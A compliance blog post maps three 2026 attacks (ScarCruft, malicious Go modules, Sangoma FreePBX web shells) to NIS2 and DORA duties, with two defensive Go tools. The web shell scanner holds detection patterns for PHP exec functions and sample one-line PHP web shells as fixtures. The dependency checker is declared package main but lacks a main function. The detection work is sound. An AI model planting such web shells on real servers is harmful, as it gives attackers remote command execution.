
Tags: NIS2 compliance, DORA compliance, cybersecurity incidents, supply chain security, incident response

2026 Cybersecurity Incidents: NIS2 & DORA Compliance Lessons from ScarCruft, Go Modules & Sangoma

By AIGovHub Editorial, March 4, 2026 (updated March 4, 2026)

Introduction: Cybersecurity Incidents as Compliance Wake-Up Calls

The cybersecurity landscape of 2026 has been marked by attacks that exploit both technical weaknesses and human factors. Incidents like the ScarCruft campaign that used Zoho WorkDrive to reach air-gapped networks, the spread of malicious Go modules built to steal credentials and plant backdoors, and the compromise of Sangoma FreePBX systems through web shells are not just technical failures; they are compliance failures. For entities in scope of the NIS2 Directive (Directive (EU) 2022/2555) or of the Digital Operational Resilience Act (DORA, Regulation (EU) 2022/2554), these events point directly at gaps in meeting those mandates. This post analyzes each incident to extract actionable lessons for strengthening cybersecurity posture and achieving regulatory compliance.

Detailed Analysis of Key 2026 Cybersecurity Incidents

1. ScarCruft Attack: Exploiting Zoho WorkDrive to Breach Air-Gapped Networks

The ScarCruft advanced persistent threat (APT) group, linked to North Korea, ran a campaign against organizations with air-gapped networks, that is, systems physically isolated from the internet. The attackers used Zoho WorkDrive, a cloud collaboration platform, as the delivery channel by injecting malicious code into legitimate software updates. Employees downloaded the tainted updates onto internet-connected systems, and those systems then acted as bridges for exfiltrating data from the isolated networks, either via removable media carried between the two environments or, where the isolation was incomplete, via internal network paths.

Key Compliance Gaps Exposed:

  • Supply Chain Security: Failure to vet third-party software updates, a core requirement under NIS2's supply chain security provisions and DORA's third-party ICT risk management.
  • Access Controls: Inadequate segmentation between internet-facing and air-gapped systems, and no control over the removable media that crossed the gap, undermining the isolation the air gap was meant to provide.
  • Incident Detection: Lack of monitoring for anomalous data transfers from isolated networks, hindering timely response.

2. Malicious Go Modules: Stealing Passwords and Deploying Backdoors

Attackers uploaded malicious packages to public Go module repositories under names that mimic popular legitimate libraries (typosquatting). Developers who mistyped or copied the wrong import path pulled these dependencies into their applications, leading to:

  • Credential theft from environment variables and configuration files.
  • Deployment of persistent backdoors enabling remote access.
  • Data exfiltration to attacker-controlled servers.

This incident underscores the risks in open-source software supply chains, where a single compromised module can cascade across thousands of projects.

Key Compliance Gaps Exposed:

  • Vulnerability Management: Lack of processes to verify the integrity of third-party code dependencies, contravening NIS2's risk management measures.
  • Data Protection: Failure to secure sensitive credentials, violating DORA's requirements for protecting critical data.
  • Third-Party Risk: Insufficient oversight of software supply chains, a focal point in both NIS2 and DORA.

3. Sangoma FreePBX Web Shell Compromise

Attackers exploited unpatched vulnerabilities in Sangoma FreePBX, a widely deployed open-source IP PBX built on Asterisk, to install web shells: server-side scripts that give the attacker command execution on the host through ordinary HTTP requests. This allowed:

  • Eavesdropping on voice communications and call metadata.
  • Lateral movement within corporate networks.
  • Deployment of ransomware or additional malware.

The compromise affected numerous organizations, highlighting the dangers of unmaintained internet-facing systems.
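As an added illustration of what "web shell" means in practice, the following Go program (written for this article, not code from Sangoma, FreePBX, or any incident report) scores PHP files by the traits web shells typically share: a function that executes a string as code or as a shell command, input taken straight from the request, and a decoder used to hide the payload. The file paths, file contents, indicator list, weights and threshold are all constructed for the example; a real deployment would scan the actual web root and compare files against the package's shipped manifest.

```go
package main

import (
	"fmt"
	"regexp"
	"sort"
)

// Indicator is one weighted pattern typical of PHP web shells. The list is a
// constructed starting point for this example, not a vendor signature set.
type Indicator struct {
	Name   string
	Weight int
	Re     *regexp.Regexp
}

var indicators = []Indicator{
	// Functions that turn a string into running code or a shell command.
	{"exec-function", 3, regexp.MustCompile(`(?i)\b(eval|system|shell_exec|passthru|popen|proc_open)\s*\(`)},
	// Backtick operator: `$cmd` executes like shell_exec().
	{"backtick-exec", 3, regexp.MustCompile("`[^`]*\\$[^`]*`")},
	// Attacker-controlled input reaching the script.
	{"request-input", 2, regexp.MustCompile(`\$_(GET|POST|REQUEST|COOKIE)\s*\[`)},
	// Decoders used to hide the payload from grep and casual review.
	{"obfuscation", 2, regexp.MustCompile(`(?i)\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(`)},
	// Primitives used to drop further files; common in legitimate code, so low weight.
	{"file-write", 1, regexp.MustCompile(`(?i)\b(move_uploaded_file|file_put_contents|fwrite)\s*\(`)},
}

// Result is the score and matched indicator names for one file.
type Result struct {
	Path  string
	Score int
	Hits  []string
}

// ScanFile scores a single PHP source text. Each indicator counts once,
// however many times it occurs, so a long legitimate file is not penalised
// for its size.
func ScanFile(path, content string) Result {
	r := Result{Path: path}
	for _, ind := range indicators {
		if ind.Re.MatchString(content) {
			r.Score += ind.Weight
			r.Hits = append(r.Hits, ind.Name)
		}
	}
	return r
}

// ScanAll returns the files whose score reaches threshold, sorted by path.
// A threshold of 5 requires code execution plus either request input or
// obfuscation, which a plain upload handler or template does not reach.
func ScanAll(files map[string]string, threshold int) []Result {
	var flagged []Result
	for path, content := range files {
		if r := ScanFile(path, content); r.Score >= threshold {
			flagged = append(flagged, r)
		}
	}
	sort.Slice(flagged, func(i, j int) bool { return flagged[i].Path < flagged[j].Path })
	return flagged
}

// sampleFiles are constructed stand-ins for a PHP web root; the paths are
// illustrative and are not taken from any FreePBX installation.
var sampleFiles = map[string]string{
	"/var/www/html/admin/uploads/.cache.php":     `<?php @eval(base64_decode($_POST['x'])); ?>`,
	"/var/www/html/admin/c.php":                  `<?php if (isset($_REQUEST['cmd'])) { echo shell_exec($_REQUEST['cmd']); } ?>`,
	"/var/www/html/admin/modules/hello/page.php": `<?php $name = htmlspecialchars($_GET['name']); echo "Hello $name"; ?>`,
	"/var/www/html/admin/modules/backup/lib.php": `<?php file_put_contents($dst, $data); ?>`,
}

func main() {
	for _, r := range ScanAll(sampleFiles, 5) {
		fmt.Printf("%-45s score=%d hits=%v\n", r.Path, r.Score, r.Hits)
	}
}
```

Content heuristics like these catch the common one-liner shells but miss a shell that has been split across files or encoded in a way the indicator list does not know; in practice they belong alongside a file-integrity comparison against the vendor package and a review of web server logs for POST requests to paths that should never receive them.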

Key Compliance Gaps Exposed:

  • Patch Management: Delayed application of security updates, failing NIS2's mandate for proactive risk mitigation.
  • Incident Reporting: Lack of procedures to report such breaches within the timelines required by NIS2 (early warning within 24 hours, incident notification within 72 hours, final report within one month of that notification) and DORA.
  • System Resilience: Inadequate measures to ensure continuous operation during attacks, contrary to DORA's digital operational resilience objectives.

Mapping Incidents to NIS2 and DORA Requirements

These incidents vividly illustrate where organizations often fall short of specific regulatory mandates. Below is a mapping of each attack vector to corresponding NIS2 and DORA obligations.

NIS2 Directive Compliance Gaps

The NIS2 Directive, which EU member states were required to transpose into national law by 17 October 2024 (several did so late, so national rules and their effective dates vary), applies to essential and important entities across sectors like energy, transport, health, and digital infrastructure. Key requirements relevant to these incidents include:

  • Risk Management Measures (Article 21): All three incidents reveal deficiencies in identifying, assessing, and mitigating cybersecurity risks. For example, the ScarCruft attack shows poor network segmentation, while the Go module issue reflects inadequate software vetting.
  • Incident Reporting (Article 23): The Sangoma compromise underscores the need for robust reporting mechanisms. NIS2 requires an early warning within 24 hours of becoming aware of a significant incident, an incident notification within 72 hours, and a final report within one month of that notification.
  • Supply Chain Security (Article 21): The ScarCruft and Go module attacks directly implicate third-party risks. NIS2 mandates assessing and ensuring the cybersecurity of supply chains and service providers.
  • Management Accountability (Article 20): These breaches suggest a lack of top-down governance, as NIS2 holds management bodies responsible for overseeing cybersecurity risk management.

DORA Regulation Compliance Gaps

DORA applies to financial entities (e.g., banks, insurers, payment institutions) from 17 January 2025. Its requirements align closely with these incidents:

  • ICT Risk Management Framework (Article 6): The Go module and Sangoma attacks demonstrate gaps in the policies, procedures and tooling the framework must cover, including vulnerability and patch management (Article 9, protection and prevention).
  • Incident Management and Reporting (Articles 17 and 19): DORA requires a process to detect, manage and notify ICT-related incidents (Article 17) and reporting of major ICT-related incidents to the competent authority through an initial notification, an intermediate report and a final report (Article 19), with the timelines set in the accompanying technical standards.
  • Digital Operational Resilience Testing (Articles 24 to 26): The ScarCruft breach of air-gapped networks indicates insufficient testing. DORA requires a testing programme for in-scope financial entities other than microenterprises (Article 24) and threat-led penetration testing at least every three years for the entities its competent authorities designate (Article 26).
  • Third-Party ICT Risk Management (Article 28): All three incidents involve third-party components (Zoho WorkDrive, Go modules, FreePBX). DORA requires rigorous due diligence and continuous monitoring of ICT third-party service providers. Note that an open-source module pulled from a public repository has no provider under contract, so it is governed through the entity's own ICT risk management framework (asset identification and protection under Articles 8 and 9) rather than through the contractual regime of Chapter V.

For a broader perspective on regulatory alignment, see our guide on AI governance in emerging technologies, which touches on overlapping security themes.

Recommended Mitigation Strategies for Compliance

To address the gaps highlighted by these incidents and ensure compliance with NIS2 and DORA, organizations should adopt the following strategies:

1. Implement Zero-Trust Architectures

Move beyond perimeter-based security. Zero-trust principles (verify every access request, assume breach, enforce least privilege) would have limited the ScarCruft attackers' ability to pivot from compromised internet-connected systems toward the isolated networks; since that campaign also crossed the gap on removable media, zero trust must be paired with device control for USB and other media. This aligns with NIS2's emphasis on access control and DORA's focus on resilience.

2. Strengthen Supply Chain Security

Develop formal processes for vetting third-party software and services:

  • Conduct regular audits of suppliers' security practices.
  • Use software composition analysis tools to detect malicious or typosquatted dependencies, as seen in the Go module incident, and verify dependency integrity: for Go, commit go.sum, keep checksum database verification (GOSUMDB) enabled, and keep the default -mod=readonly build mode in CI rather than -mod=mod, so an unexpected module change fails the build instead of being silently accepted.
  • Require compliance certifications (e.g., ISO/IEC 27001) from critical vendors.

This directly supports NIS2 Article 21 and DORA Article 28 requirements.
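As an added example (not code from the Go project, from any SCA vendor, or from the incident reports), the following Go program performs the two checks that matter most for the Go module incident described earlier and for the dependency vetting recommended here: it confirms every required module has a content hash in go.sum, and it compares each module path against a trusted allowlist to flag paths that sit within two edits of a trusted path, the classic typosquat. The allowlist, the sample go.mod and go.sum, and the edit-distance threshold are assumptions made for the example; the go.mod parser is deliberately minimal, and real tooling should use golang.org/x/mod/modfile.

```go
package main

import (
	"regexp"
	"sort"
	"strings"
)

// trusted is a constructed allowlist of reviewed module paths; in practice it would come from an internal proxy or SCA policy.
var trusted = []string{"github.com/gorilla/mux", "github.com/spf13/cobra", "golang.org/x/crypto"}

// requireEntry is a deliberately small go.mod parser: it matches "<module> <version>" lines in
// require blocks and single-line requires and ignores "// indirect" comments.
var requireEntry = regexp.MustCompile(`(?m)^\s*(?:require\s+)?([^\s()]+)\s+(v\d\S*)`)

// ParseRequires returns module path -> required version.
func ParseRequires(gomod string) map[string]string {
	deps := map[string]string{}
	for _, m := range requireEntry.FindAllStringSubmatch(gomod, -1) {
		deps[m[1]] = m[2]
	}
	return deps
}

// ParseSums returns the "<module> <version>" pairs that carry a content hash in go.sum (lines without "/go.mod").
func ParseSums(gosum string) map[string]bool {
	seen := map[string]bool{}
	for _, l := range strings.Split(gosum, "\n") {
		if f := strings.Fields(l); len(f) == 3 && !strings.HasSuffix(f[1], "/go.mod") {
			seen[f[0]+" "+f[1]] = true
		}
	}
	return seen
}

// levenshtein is the edit distance between a and b.
func levenshtein(a, b string) int {
	prev, cur := make([]int, len(b)+1), make([]int, len(b)+1)
	for j := range prev {
		prev[j] = j
	}
	for i := 1; i <= len(a); i++ {
		cur[0] = i
		for j := 1; j <= len(b); j++ {
			cost := 1
			if a[i-1] == b[j-1] {
				cost = 0
			}
			best := prev[j] + 1 // deletion
			if cur[j-1]+1 < best { // insertion
				best = cur[j-1] + 1
			}
			if prev[j-1]+cost < best { // substitution
				best = prev[j-1] + cost
			}
			cur[j] = best
		}
		prev, cur = cur, prev
	}
	return prev[len(b)]
}

// Vet reports, sorted, every dependency that lacks a go.sum hash, sits within two edits of a
// trusted module (a likely typosquat; treat as a review item, since unrelated legitimate
// modules can also be this close), or is not on the allowlist at all.
func Vet(gomod, gosum string) []string {
	sums := ParseSums(gosum)
	var out []string
	for mod, ver := range ParseRequires(gomod) {
		if !sums[mod+" "+ver] {
			out = append(out, mod+" "+ver+": no go.sum hash; integrity not verified")
		}
		reason := ": not on allowlist; review before use"
		for _, t := range trusted {
			if mod == t {
				reason = "" // exact match with a reviewed module: nothing to report
				break
			}
			if levenshtein(mod, t) <= 2 {
				reason = ": possible typosquat of " + t
			}
		}
		if reason != "" {
			out = append(out, mod+" "+ver+reason)
		}
	}
	sort.Strings(out)
	return out
}

// Constructed inputs: one near-miss of a trusted path and one unknown module with no go.sum entry.
const sampleGoMod = `module example.com/app
require (
	github.com/gorilla/mux v1.8.1
	github.com/gorila/mux v1.8.1 // indirect
	golang.org/x/crypto v0.31.0
	github.com/evil/backdoor v0.0.1
)`

const sampleGoSum = `github.com/gorilla/mux v1.8.1 h1:AAAA
github.com/gorilla/mux v1.8.1/go.mod h1:BBBB
github.com/gorila/mux v1.8.1 h1:CCCC
golang.org/x/crypto v0.31.0 h1:DDDD`
```

Run Vet over the committed go.mod and go.sum in CI after go mod tidy; a non-empty result fails the build and routes the dependency to review. The go.sum check complements rather than replaces the checksum database: go.sum proves the build uses the bytes that were reviewed, while the allowlist comparison is what catches a module that is genuinely published under a look-alike name.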

3. Enhance Incident Response Capabilities

Establish clear procedures for detecting, responding to, and reporting incidents:

  • Train employees and administrators to recognize threats, from phishing to the signs of a web shell on an internet-facing system (unexpected PHP files in the web root, POST requests to unfamiliar paths) seen in the Sangoma compromise.
  • Implement security information and event management (SIEM) systems for real-time monitoring.
  • Practice incident response drills to meet NIS2's 24/72-hour reporting deadlines and DORA's notification rules.

4. Regular Audits and Continuous Monitoring

Conduct periodic cybersecurity assessments, including:

  • Vulnerability scans and penetration testing, especially for internet-facing systems like FreePBX.
  • Reviews of access logs and network traffic for anomalies.
  • Compliance checks against NIS2 and DORA frameworks using tools like AIGovHub's cybersecurity compliance monitoring platform, which helps track regulatory requirements and identify gaps.

5. Foster a Culture of Security Awareness

Human error often underpins breaches. Regular training on topics like dependency hygiene (checking the exact module path and its checksum before adding a library, relevant to the Go module incident) and phishing awareness can reduce risk. This supports the Awareness and Training category (PR.AT) of NIST CSF 2.0, a framework many regulators reference.

For technical solutions, consider affiliate partners like CrowdStrike for endpoint detection and response (EDR) to combat threats like ScarCruft, or Zscaler for zero-trust network access to secure remote connections. Always verify current pricing with vendors.

Conclusion: Proactive Governance is Key to Compliance

The ScarCruft, malicious Go module, and Sangoma incidents of 2026 serve as stark reminders that cybersecurity is not just a technical issue but a compliance imperative. Under NIS2 and DORA, organizations face stringent requirements for risk management, incident reporting, and supply chain security—areas where these attacks exposed critical weaknesses. By adopting mitigation strategies such as zero-trust architectures, rigorous third-party vetting, and enhanced monitoring, businesses can not only defend against similar threats but also demonstrate adherence to evolving regulations. Proactive governance, supported by continuous compliance tracking, is essential for resilience in an increasingly hostile digital environment.

Key Takeaways:

  • Air-gapped networks are not impervious; supply chain compromises, as seen in the ScarCruft attack, can bridge isolation gaps, highlighting the need for NIS2/DORA-aligned third-party risk management.
  • Malicious software dependencies, like the Go modules, underscore the importance of vulnerability management and software integrity checks mandated by both regulations.
  • Incidents like the Sangoma web shell compromise reveal gaps in patch management and incident reporting, directly contravening NIS2's timelines and DORA's resilience requirements.
  • Mitigation requires a holistic approach: zero-trust models, employee training, regular audits, and tools for continuous compliance monitoring.
  • Organizations should confirm the national transposition of NIS2 in each member state where they operate, since transposition dates and scope decisions vary, and confirm whether DORA applies to their entity type; DORA itself has applied uniformly since 17 January 2025.

To stay ahead of these challenges, leverage AIGovHub's cybersecurity compliance toolkit to monitor NIS2, DORA, and other framework requirements in real-time. Our platform helps you identify gaps, automate reporting, and ensure your organization is prepared for the next threat. Some links in this article are affiliate links. See our disclosure policy.

This content is for informational purposes only and does not constitute legal advice.